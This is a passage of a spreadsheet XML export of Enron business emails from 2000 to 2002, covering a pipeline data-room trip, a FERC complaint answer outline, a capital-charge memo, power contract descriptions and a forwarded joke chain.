_x000D_
They are looking at our data request and working to make sure they can accomodate us.  Also,  Engineers available for interviewing are only available on Monday.  Legal staff needed to be interviewed are only available on Tuesday.  If there are other staff that are needed for interviews, please let me know._x000D_
_x000D_
Some attendees are staying at the Salt Lake City MARRIOTT SALT LAKE CITY, 75 S. West Temple, Salt Lake City, UT 84101 Phone: 1-801-531-0800 FAX: 1-801-532-4127_x000D_
 for Sunday and Monday nights.  You need to make your own travel reservations and it is advised that you do that as soon as possible._x000D_
_x000D_
The Bid for Southern Trails West Leg) is due December 10th._x000D_
_x000D_
I show the following people going to the data room:_x000D_
_x000D_
1.	L.D. Stephens - Team Leader/Operations_x000D_
2.	Larry Campbell - Environmental_x000D_
3.	Larry Gleffe - ROW _x000D_
4.	Mike Ames - Pipeline Safety_x000D_
5.	Warren Schick - Property Tax_x000D_
6.	Bob Chandler - Finance_x000D_
7.	Stephen Dowd - Corp Dev_x000D_
8.	Kim Watson - Marketing _x000D_
9.   Mark McConnell - Marketing_x000D_
_x000D_
Please let me know if this list needs any corrections._x000D_
_x000D_
Mark_x000D_
_x000D_
Mark McConnell_x000D_
Transwestern Pipeline Company_x000D_
713-345-7896   office_x000D_
713-822-4862   cell_x000D_
713-646-2551   fax_x000D_
mark.mcconnell@enron.com</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kristi.giron@cfisd.net', 'dgiron1@pdq.net', 'hollyw@email.msn.com'})</t>
  </si>
  <si>
    <t>WHAZZUP..........????</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 11/30/2000 _x000D_
04:08 PM ---------------------------_x000D_
_x000D_
_x000D_
Kevin Bosse_x000D_
11/30/2000 03:27 PM_x000D_
To: Darron C Giron/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, _x000D_
Bosseb@navasota.k12.tx.us, rangeland.bfox@taexgw.tamu.edu, jfox@rtis.com, _x000D_
Linda J Ewing/HOU/ECT@ECT, lisa@rtis.com_x000D_
cc:  _x000D_
Subject: WHAZZUP..........????_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kevin Bosse/HOU/ECT on 11/30/2000 03:24 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Diane Anderson @ ENRON                           11/30/2000 12:48 PM_x000D_
	_x000D_
_x000D_
To: Kevin Bosse/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: WHAZZUP..........????_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Diane Anderson/NA/Enron on 11/30/2000 _x000D_
12:49 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Andrea R Guillen @ ECT                           11/30/2000 12:45 PM_x000D_
	_x000D_
_x000D_
Sent by: Andrea R Guillen@ECT_x000D_
To: Diane Anderson/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: WHAZZUP..........????_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Andrea R Guillen/HOU/ECT on 11/30/2000 _x000D_
12:45 PM ---------------------------_x000D_
From: Phenicia Olivier on 11/30/2000 11:22 AM_x000D_
To: Jimmy Simien/Corp/Enron@ENRON, Sarah Heineman/HOU/ECT@ECT, Jessica _x000D_
Anaya/HOU/ECT@ECT, Beverly F Lakes/HOU/ECT@ECT, Jana Mills/HOU/ECT@ECT, _x000D_
Brenda Barreda/HOU/EES@EES, Maria Sandoval/HOU/ECT@ECT, Mary _x000D_
Border/Corp/Enron@Enron, Michelle Wenz/Corp/Enron@Enron, Andrea R _x000D_
Guillen/HOU/ECT@ECT, Elizabeth Soto/HOU/ECT@ECT, Cecilia _x000D_
Rodriguez/NA/Enron@ENRON, Porsha 944_944@excite.com, Jessie _x000D_
Bledsoe/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: WHAZZUP..........????_x000D_
_x000D_
_x000D_
----- Forwarded by Phenicia Olivier/HOU/ECT on 11/30/2000 11:14 AM -----_x000D_
_x000D_
	Paula Pierre@ENRON COMMUNICATIONS_x000D_
	11/30/2000 10:00 AM_x000D_
		 _x000D_
		 To: Angie Collins/HOU/ECT@ECT, Bernita _x000D_
Perry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Chaun Roberts/Enron _x000D_
Communications, Doug Gichana/Enron Communications@Enron Communications, _x000D_
Janell Avery/HOU/EES@EES, latonya_fondal@mhhs.org, mcarson@caraustar.com, _x000D_
Phenicia Olivier/HOU/ECT@ECT, rose.chambers@grantprideco.com, Tina _x000D_
Lamb/Corp/Enron@ENRON, trudy.southall@cmcsg.com_x000D_
		 cc: _x000D_
		 Subject: WHAZZUP..........????_x000D_
_x000D_
_x000D_
----- Forwarded by Paula Pierre/Enron Communications on 11/30/00 10:06 AM _x000D_
-----_x000D_
_x000D_
_x000D_
It did not take long._x000D_
_x000D_
_x000D_
?_x000D_
 - election_whazzup.exe_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 08:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: OTC commodity derivative</t>
  </si>
  <si>
    <t xml:space="preserve">Jae-Moo_x000D_
_x000D_
Thanks for the information, but would appreciate if you would direct your _x000D_
communication with Kim &amp; Chang through me. _x000D_
_x000D_
Regards_x000D_
Matt_x000D_
_x000D_
---------------------- Forwarded by Matthias Lee/SIN/ECT on 07/24/2000 03:40 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jae-Moo Lee@ENRON_x000D_
07/24/2000 09:55 AM_x000D_
To: "skhong (Suhn-Kyoung Hong)" &lt;skhong@kimchang.com&gt;_x000D_
cc: matthias.lee@enron.com, Michelle Lee/Corp/Enron@Enron, Mike _x000D_
Dahlke/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: OTC commodity derivative  _x000D_
_x000D_
Dear Ms. Hong,_x000D_
_x000D_
Thank you very much for the information.  _x000D_
_x000D_
I had a chance to talk to Hyundai Oil regarding the report requirement issue _x000D_
as well as other business issues.  According to Hyundai Oil, they always put _x000D_
2 to 4 deals together, days or sometimes weeks after the deals have been _x000D_
made, each time they file a report  to BOK.   Such ex post facto package _x000D_
report is acceptable to BOK as far as the deals do not fall into one of the 2 _x000D_
categories specified in the FX Transaction Regulation (deals with option _x000D_
premium higher than 20% or deals with room for illegality).   In fact, the _x000D_
number of oil paper transactions that Hyundai Oil has done is more than 20, _x000D_
and Hyundai Oil did not have any problems getting the reports filed with the _x000D_
BOK.   It sometimes took 1 week and sometimes 2 to 3 days, and Hyundai Oil _x000D_
did not really care how long it would take because both Hyundai and the BOK _x000D_
understood that the reports were (or had to be) a formality to be made for _x000D_
the deals already done.   _x000D_
_x000D_
Other companies including SK Corp., Samsung and LG that we contacted use _x000D_
their Singapore branch as a vehicle for legal documentation (although Seoul _x000D_
HQ makes decision) and do not have to file such reports.  The reason for _x000D_
using their Singapore branches is not the report requirement hassle but their _x000D_
strategic and organizational issues, they said._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jae-Moo_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"skhong (Suhn-Kyoung Hong)" &lt;skhong@kimchang.com&gt; on 07/21/2000 06:10:39 PM_x000D_
To: &lt;jlee5@enron.com&gt;, &lt;Matthias.lee@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: OTC commodity derivative_x000D_
_x000D_
_x000D_
We contacted the responsible officers of the BOK and confirmed that the BOK _x000D_
received 7 or 8 reports since April last year (when the rules changed) _x000D_
regarding OTC commodity derivative transactions and all of them were filed by _x000D_
Hyundai Oil Refinery in connection with oil derivatives.  It appears those _x000D_
reports were accepted by the BOK.  The review and processing of the reports _x000D_
would generally take 1 or 2 weeks.  Regards,_x000D_
_x000D_
_x000D_
_x000D_
-------------------------------------------------------------_x000D_
E-Mail  : lawkim@kimchang.com_x000D_
Tel.    : +822-3703-1114_x000D_
Fax     : +822-737-9091_x000D_
Address : Seyang Building, 223 Naeja-Dong, Chongro-Ku, Seoul, Korea 110-720_x000D_
_x000D_
This e-mail is intended for the exclusive use of the individual or entity _x000D_
named above and may constitute information that is privileged or confidential _x000D_
or otherwise protected from disclosure.  Dissemination, distribution, _x000D_
forwarding or copying of this e-mail by anyone other than the intended _x000D_
recipient is prohibited.  If you have received this e-mail in error, please _x000D_
notify us immediately by telephone or e-mail and completely delete or destroy _x000D_
any and all electronic or other copies of the original message._x000D_
-------------------------------------------------------------_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 07:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'jdasovic@ees.enron.com', 'mike.smith@enron.com', 'james.keller@enron.com', 'harry.kingerski@enron.com', 'mona.petrochko@enron.com', 'richard.sanders@enron.com', 'james.steffes@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'christi.nicolay@enron.com', 'carrrn@bracepatt.com', 'dennis.benevides@enron.com', 'steve.c.hall@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'seabron.adamson@frontier-economics.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t>Proposed Answer of CMUA's Complaint</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry about the Greek in the first paragraph of my last E-mail.  I still=20_x000D_
can't figure out how I did that.  All I said was, as you know, CMUA filed a=_x000D_
=20_x000D_
complaint with FERC asking for cost-based rates and introducing an outline =_x000D_
of=20_x000D_
an answer to the legal issues. =20_x000D_
_x000D_
Under the FERC rules, we are required to file an answer to the complaint.  =_x000D_
I=20_x000D_
have also asked Seabron for an estimate for answering the economics=20_x000D_
assertions raised in CMUA and PG&amp;E's filings._x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 10/18/2000 11:18 A=_x000D_
M=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Mary Hain_x000D_
10/18/2000 10:37 AM_x000D_
To: Christian Yoder/HOU/ECT@ECT, steve.c.hall@enron.com, Richard Sanders,=_x000D_
=20_x000D_
Susan J Mara/SFO/EES@EES, Mona Petrochko, jdasovic@ees.enron.com, Paul=20_x000D_
Kaufman/PDX/ECT@ECT, James D Steffes/NA/Enron@Enron, Joe Hartsoe@Enron, Sar=_x000D_
ah=20_x000D_
Novosel/Corp/Enron@ENRON, James E Keller/HOU/EES@EES, Mike D=20_x000D_
Smith/HOU/EES@EES, Harry Kingerski/HOU/EES@EES, Dennis Benevides, Tim=20_x000D_
Belden/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT, Jeff Richter/HOU/ECT@ECT_x000D_
cc: Christi Nicolay, carrrn@bracepatt.com=20_x000D_
Subject: Proposed Answer of CMUA's Complaint_x000D_
_x000D_
As you have already heard, California Municipal Utilities Association filed=_x000D_
 a=20_x000D_
complaint with FERC asking for cost based rates. The following is a brief=_x000D_
=20_x000D_
outline of an EPMI/EES answer to the complaint.  The answer is due Friday. =_x000D_
=20_x000D_
Please send me any comments ASAP.=20_x000D_
_x000D_
? The complaint should be rejected because it wrongly assumes that the=20_x000D_
Commission has no option to ensure just and reasonable rates but to require=_x000D_
=20_x000D_
cost based rates because there is no low cost solution to the problems=20_x000D_
currently faced by the California markets.  We should attach our white pape=_x000D_
r=20_x000D_
to our protest and state that the paper explains how these problems could b=_x000D_
e=20_x000D_
solved at little or no cost to the customers. =20_x000D_
? I list here, for your information, the reasons CMUA claims that markets a=_x000D_
re=20_x000D_
not competitive (these reasons will not be re-listed in the pleading).=20_x000D_
? 2000 prices greatly exceeded 1999 prices without regard to load._x000D_
? zonal constrained prices, even in the off-peak hours, do not reflect=20_x000D_
competitive outcomes for low load conditions. =20_x000D_
? even small players can be price setters_x000D_
? The changes required are additional generation, transmission, and demand=_x000D_
=20_x000D_
response and will cost tens of millions of dollars and take lengthy periods=_x000D_
=20_x000D_
of time to implement._x000D_
? There is no evidence that markets will ensure just and reasonable rates i=_x000D_
n=20_x000D_
the near future._x000D_
? CMUA asserts that with the advent of electric restructuring, the Commissi=_x000D_
on=20_x000D_
has increasingly allowed energy and ancillary services to be sold at=20_x000D_
market-based rates.  However, CMUA is wrong in the context of the West wher=_x000D_
e=20_x000D_
there has been market-based trading of electricity before electric=20_x000D_
restructuring, since the FERC approved the Western Systems Power Pool=01,s=_x000D_
=20_x000D_
contract in 1991.  The Commission=01,s rules didn=01,t create the wholesale=_x000D_
 market=20_x000D_
in the past, the market did and it was running fine until it was messed up =_x000D_
by=20_x000D_
certain market rules were imposed that are enumerated in our paper.  The=20_x000D_
problem is not the market-based rates.  The problem is the market rules._x000D_
? CMUA=01,s motion does not address how market-based rates would be calcula=_x000D_
ted=20_x000D_
for marketers that do not sell power from their own resources, let alone=20_x000D_
reflect the trading of basis points.  Almost all of the power EPMI sells is=_x000D_
=20_x000D_
power it has bought from some other marketer or generator.  Many of EPMI=01=_x000D_
,s=20_x000D_
deals are done through brokers such that EPMI does not find out the identit=_x000D_
y=20_x000D_
of the seller until after a deal has been struck.  Accordingly, EPMI gets n=_x000D_
o=20_x000D_
information about the cost of the underlying generation.=20_x000D_
? If FERC doesn=01,t try to fix the market but simply takes away our=20_x000D_
market-based rates, since there=01,s is no basis for us to set cost based r=_x000D_
ates,=20_x000D_
we would go out of business.  Besides there=01,s no reason to take away our=_x000D_
=20_x000D_
market-based rates because we are not exercising market power.  So if FERC=_x000D_
=20_x000D_
could fix the problem with a less onerous solution (as we=01,ve proposed in=_x000D_
 our=20_x000D_
white paper), requiring cost-based rates would constitute a regulatory taki=_x000D_
ng=20_x000D_
of our business and we would have to be compensated using the constitutiona=_x000D_
l=20_x000D_
standard.=20_x000D_
 CMUA does not provide any expert testimony to support its position.  Rathe=_x000D_
r,=20_x000D_
its evidence is =01&amp;drawn from materials prepared and testimony delivered b=_x000D_
y the=20_x000D_
California ISO and other public sources.=018  Beyond the difficult evidenti=_x000D_
ary=20_x000D_
issue posed by the fact that CMUA cannot swear to the veracity of informati=_x000D_
on=20_x000D_
produced by third parties, EPMI would have no opportunity to conduct=20_x000D_
discovery or cross-examine of such =01&amp;witnesses.=018=20_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 18:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Capital Book</t>
  </si>
  <si>
    <t>To further the process of reaching the stated objectives of increasing Enro=_x000D_
n=20_x000D_
America=01,s Velocity of Capital and associated Return on Invested Capital,=_x000D_
 we=20_x000D_
have decided to create a Capital Book. The Capital Book will have no profit=_x000D_
=20_x000D_
target associated with it and will be managed by Joe Deffner. The purpose o=_x000D_
f=20_x000D_
creating this book is to ensure that all transactions within Enron Americas=_x000D_
,=20_x000D_
with any form of capital requirement, are structured correctly and are=20_x000D_
allocated the appropriate cost of capital charge.=20_x000D_
_x000D_
The previous numbers used in the Business Plans at the beginning of this ye=_x000D_
ar=20_x000D_
will remain for all transactions in place and where we hold assets.=20_x000D_
Therefore, on any assets currently held within each business area, the=20_x000D_
capital charge will remain at 15%. Internal ownership of these assets will =_x000D_
be=20_x000D_
maintained by the originating Business Unit subject to the Internal Ownersh=_x000D_
ip=20_x000D_
Policy outlined below._x000D_
_x000D_
The cost of capital associated with all transactions in Enron Americas will=_x000D_
=20_x000D_
be set by Joe. This process is separate and apart from the current RAC=20_x000D_
process for transactions which will continue unchanged._x000D_
_x000D_
Capital investments on balance sheet will continue to accrue a capital char=_x000D_
ge=20_x000D_
at the previously established rate of 15%. Transactions which are structure=_x000D_
d=20_x000D_
off credit will receive a pure market pass through of the actually incurred=_x000D_
=20_x000D_
cost of capital as opposed to the previous 15% across the board charge.=20_x000D_
Transactions which are structured off balance sheet, but on credit will be=_x000D_
=20_x000D_
priced based upon the financial impact on Enron America=01,s overall credit=_x000D_
=20_x000D_
capacity._x000D_
_x000D_
On transactions that deploy capital through the trading books, the Capital=_x000D_
=20_x000D_
Book will take a finance reserve on each transaction, similar to the way th=_x000D_
e=20_x000D_
Credit Group takes a credit reserve. This finance reserve will be used=20_x000D_
specifically to fund the capital required for the transaction. As noted=20_x000D_
above, the Capital Book will have no budget and will essentially charge out=_x000D_
=20_x000D_
to the origination and trading groups at actual cost._x000D_
_x000D_
By sending market-based capital pricing signals internally, Enron America=_x000D_
=01,s=20_x000D_
sources of capital and liquidity should be better optimized across the=20_x000D_
organization.=20_x000D_
_x000D_
Questions regarding the Capital Book can be addressed to:_x000D_
Joe Deffner  853-7117_x000D_
Alan Quaintance 345-7731</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 14:34:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'j..kean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>World's Greatest Website</t>
  </si>
  <si>
    <t>When all seems lost, purely sophomoric, bathroom humor wins the day._x000D_
_x000D_
http://www.pullmyfinger.com/</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 10:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: HEDGE FUNDS - Trip</t>
  </si>
  <si>
    <t>Per_x000D_
_x000D_
Give me a call in January on this._x000D_
_x000D_
John_x000D_
_x000D_
P.S.  Happy Holidays.</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 07:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jkeffer@kslaw.com', 'ccampbell@kslaw.com', 'mreuter@kslaw.com', 'carlos.sole@enron.com'})</t>
  </si>
  <si>
    <t>Put/Call rights in LLC agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Turbine Team,_x000D_
_x000D_
For future reference we should add in the put/call language (similiar to the _x000D_
language in 6.2 (c) of the Intergen deal) which allows Enron to put the _x000D_
equity to the buyer at any time GE consents.  We should soften the approval _x000D_
rights of the purchaser._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 01:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Examples of Power Long Descriptions</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Elizabeth Sager/HOU/ECT on 05/16/2001 08:47 AM -----_x000D_
_x000D_
	Carlos Alatorre/ENRON@enronXgate_x000D_
	05/15/2001 06:24 PM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT_x000D_
		 cc: Harry Arora/ENRON@enronXgate, Robert Stalford/NA/Enron@Enron_x000D_
		 Subject: Examples of Power Long Descriptions_x000D_
_x000D_
Elizabeth:_x000D_
Below you can find examples of Long Descriptions for Phy Power._x000D_
Please let me know if you have any questions/comments_x000D_
Thanks_x000D_
Carlos_x000D_
_x000D_
_x000D_
US Pwr Phy Firm  PJM-W Peak              Jul01           USD/MWh_x000D_
A US Power Transaction with Enron Power Marketing, Inc., under which the _x000D_
Seller shall sell and the Buyer shall purchase a quantity of firm energy _x000D_
equal to the Hourly Quantity at the Contract Price. The Contract Price shall _x000D_
be as submitted by the Counterparty via the Website._x000D_
The term of the Transaction shall correspond to the date(s) set forth in the _x000D_
Product description on the Website._x000D_
The transaction is for delivery or receipt of energy at the PJM Western Hub._x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be megawatt-hours _x000D_
(MWh) and the quantity shown shall be in MW's delivered in each applicable _x000D_
hour for the duration of the Transaction (the "Hourly Quantity')._x000D_
The transaction is for on-peak ("Peak") hours on each Delivery Day beginning _x000D_
with the hour ending 0800 (7:00 am) and concluding with the hour ending 2300 _x000D_
(11:00 pm) Eastern Prevailing Time.  "Delivery Day" means a day during the _x000D_
term of the transaction that is a Monday, Tuesday, Wednesday, Thursday, or _x000D_
Friday, excluding any day that is a NERC holiday._x000D_
_x000D_
US Pwr Phy Firm  PJM-W Peak              Jan-Dec03       USD/MWh_x000D_
A US Power Transaction with Enron Power Marketing, Inc., under which the _x000D_
Seller shall sell and the Buyer shall purchase a quantity of firm energy _x000D_
equal to the Hourly Quantity at the Contract Price. The Contract Price shall _x000D_
be as submitted by the Counterparty via the Website._x000D_
The transaction is for the applicable hours as set forth herein on each _x000D_
Delivery Day for the Effective Date 01 Jan 2003 to the Termination Date 31 _x000D_
Dec 2003._x000D_
The transaction is for delivery or receipt of energy at the PJM Western Hub._x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be megawatt-hours _x000D_
(MWh) and the quantity shown shall be in MW's delivered in each applicable _x000D_
hour for the duration of the Transaction (the "Hourly Quantity')._x000D_
The transaction is for on-peak ("Peak") hours on each Delivery Day beginning _x000D_
with the hour ending 0800 (7:00 am) and concluding with the hour ending 2300 _x000D_
(11:00 pm) Eastern Prevailing Time.  "Delivery Day" means a day during the _x000D_
term of the transaction that is a Monday, Tuesday, Wednesday, Thursday, or _x000D_
Friday, excluding any day that is a NERC holiday._x000D_
_x000D_
US Pwr Phy Index PJM-W MWD Peak          Jun01           USD/MWh_x000D_
A US Power Transaction with Enron Power Marketing, Inc., under which the _x000D_
Seller shall sell and the Buyer shall purchase a quantity for firm energy _x000D_
equal to the Hourly Quantity at the Contract Price.  The Contract Price shall _x000D_
be the Floating Price, as adjusted by the price submitted by the Counterparty _x000D_
via the Website.  The period of time during which the Floating Price is _x000D_
derived (a "Determination Period") shall be a calendar month during the term _x000D_
of the Transaction; provided that, if the term of the Transaction is less _x000D_
than one month, such Determination Period shall be the term of the _x000D_
Transaction._x000D_
The term of the Transaction shall correspond to the date(s) set forth in the _x000D_
Product description on the Website._x000D_
The transaction is for delivery or receipt of energy at the PJM Western Hub._x000D_
The Floating Price during a Determination Period shall be the average of the _x000D_
daily prices listed in the Index for power delivered during Peak hours on _x000D_
each Delivery Day during the applicable Determination Period.  The Floating _x000D_
Price for each Determination Period shall be calculated utilizing the daily _x000D_
prices published in Megawatt Daily's Market Report under the headings "Trades _x000D_
for Standard 16-Hour Daily Products;Weighted Average Index; PJM-West"  (the _x000D_
"Index")._x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be megawatt-hours _x000D_
(MWh) and the quantity shown shall be in MW's delivered in each applicable _x000D_
hour for the duration of the Transaction (the "Hourly Quantity')._x000D_
The transaction is for on-peak ("Peak") hours on each Delivery Day beginning _x000D_
with the hour ending 0800 (7:00 am) and concluding with the hour ending 2300 _x000D_
(11:00 pm) Eastern Prevailing Time.  "Delivery Day" means a day during the _x000D_
term of the transaction that is a Monday, Tuesday, Wednesday, Thursday, or _x000D_
Friday, excluding any day that is a NERC holiday._x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 04:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.smith@enron.com', 'robert.superty@enron.com', 'katherine.kelly@enron.com', 'steve.venturatos@enron.com', 'pat.clynes@enron.com', 'lisa.csikos@enron.com', 'michael.eiben@enron.com', 'bryce.baxter@enron.com', 'jefferson.sorenson@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Organisational Meeting</t>
  </si>
  <si>
    <t>Please plan on attending an Organisational meeting today at 2:30 in room 46C1._x000D_
_x000D_
Sorry for the short notice._x000D_
_x000D_
If you can not make it, please get with Steve Jackson, Leslie Reeves or _x000D_
myself so we can_x000D_
keep you informed._x000D_
_x000D_
Thanks _x000D_
_x000D_
Bob</t>
  </si>
  <si>
    <t>Tue, 25 Jun 2002 09:26:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bfraser@reliant.com'})</t>
  </si>
  <si>
    <t>frozenset({'chris.germany@enron.com', 'goodell.scott@enron.com', 'm..silby@enron.com', 'lindsey.hunt@enron.com'})</t>
  </si>
  <si>
    <t>Upcoming Tuesdays</t>
  </si>
  <si>
    <t>After determining who is available over the next few weeks, I suggest we not meet the next 2 Tuesdays.  We will pick back up with Session 4 on July 16._x000D_
_x000D_
Thx!_x000D_
Bill</t>
  </si>
  <si>
    <t>Sat, 11 Nov 2000 09:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Turbine "breakout" contract for LV turbines</t>
  </si>
  <si>
    <t xml:space="preserve">Bill:  As we discussed on the phone, we need to pull together the technical _x000D_
information for the 4 LM 6000 machines to be installed in the LVC 2 project._x000D_
_x000D_
I am attaching the most current draft of the the "breakout contract" for your _x000D_
review.  The final draft is scheduled to come out in the next few days._x000D_
_x000D_
I am also attaching a copy of the "summary of terms" I prepared to _x000D_
distribution to the bidders.  GE has provided input on this summary as to _x000D_
site-adjusted performance specifications._x000D_
_x000D_
Please look over these documents, review the attachments to the existing _x000D_
GE/West LB contract, and determine what the appropriate technical information _x000D_
should be.  We should be able to pull a lot of the information from the _x000D_
attachments to the West LB contract._x000D_
_x000D_
I will call in from San Francisco on Monday to talk about how we can most _x000D_
efficiently do this.  Please feel free to call me on my cell phone (503) _x000D_
803-1700 to discuss.  _x000D_
_x000D_
Thanks._x000D_
_x000D_
[See 11/03 drafts forwarded a few minutes ago for the current form of _x000D_
breakout contract]_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 15:55:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>East Volume Analysis</t>
  </si>
  <si>
    <t>The file is in O:\_Dropbox\Stacey\Quarterly Comparison.xls_x000D_
_x000D_
Let me know when you get the file so we can make sure it will work for you._x000D_
_x000D_
Thanks,_x000D_
Stacey</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 12:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeannie.mandelker@enron.com', 'skean@enron.com'})</t>
  </si>
  <si>
    <t>Re: Frevert Piece</t>
  </si>
  <si>
    <t>Jeannie:  Here are a few proposed edits.  If you need anything, just holler._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 19:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tellwood@mayerbrown.com', 'schottla@us.cibc.com', 'jlawler@wilmingtontrust.com', 'mark.wolf@us.cibc.com', 'aroberts@wilmingtontrust.com', 'tamullen@prickett.com', 'charles.delacey@enron.com', 'mcfam@andrews-kurth.com', 'alan.quaintance@enron.com', 'annmarie.tiller@enron.com', 'mniebruegge@mayerbrown.com', 'kenton@rlf.com', 'sulld@andrews-kurth.com', 'angela.davis@enron.com', 'brent.vasconcellos@enron.com', 'lowed@andrews-kurth.com', 'sara.shackleton@enron.com', 'brenda.l.funk@enron.com', 'gareth.bahlmann@enron.com', 'mercedes.arango@us.cibc.com', 'barbd@andrews-kurth.com', 'lkao@mayerbrown.com', 'bill.bowes@enron.com', 'trushar.patel@enron.com', 'gina.karathanos@enron.com'})</t>
  </si>
  <si>
    <t>Hawaii I Facility Agreement</t>
  </si>
  <si>
    <t>Attached, in Word and WordPerfect, is the current draft of the Hawaii I _x000D_
Facility Agreement.  For ease of review, I have marked the agreement against _x000D_
the current draft of the Hawaii II Facility Agreement._x000D_
_x000D_
Muriel C. McFarling_x000D_
Andrews &amp; Kurth L.L.P._x000D_
1717 Main Street, Suite 3700_x000D_
Dallas, Texas 75201_x000D_
(214) 659-4461_x000D_
(214) 659-4784 (fax)_x000D_
_x000D_
 - Hawaii_I.wpd_x000D_
 - Hawaii_I.doc</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 03:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>crude &amp; products spreads and heat &amp; gas cracks as hot links 5/2</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  , 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
Crude Spread     http://www.carrfut.com/research/Energy1/crudespread77.pdf_x000D_
Heat Spread     http://www.carrfut.com/research/Energy1/heatspread77.pdf_x000D_
Unleaded Spread_x000D_
http://www.carrfut.com/research/Energy1/unleadspread77.pdf_x000D_
_x000D_
Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack77.pdf_x000D_
Gas Crack     http://www.carrfut.com/research/Energy1/gascrack77.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 15:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>it was supposed to have some pics</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 04:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alexanms@sce.com'})</t>
  </si>
  <si>
    <t>First Draft of a summary document</t>
  </si>
  <si>
    <t>Jeff,_x000D_
_x000D_
This is my first draft of a settlement summary document.  Let me know what_x000D_
you think._x000D_
_x000D_
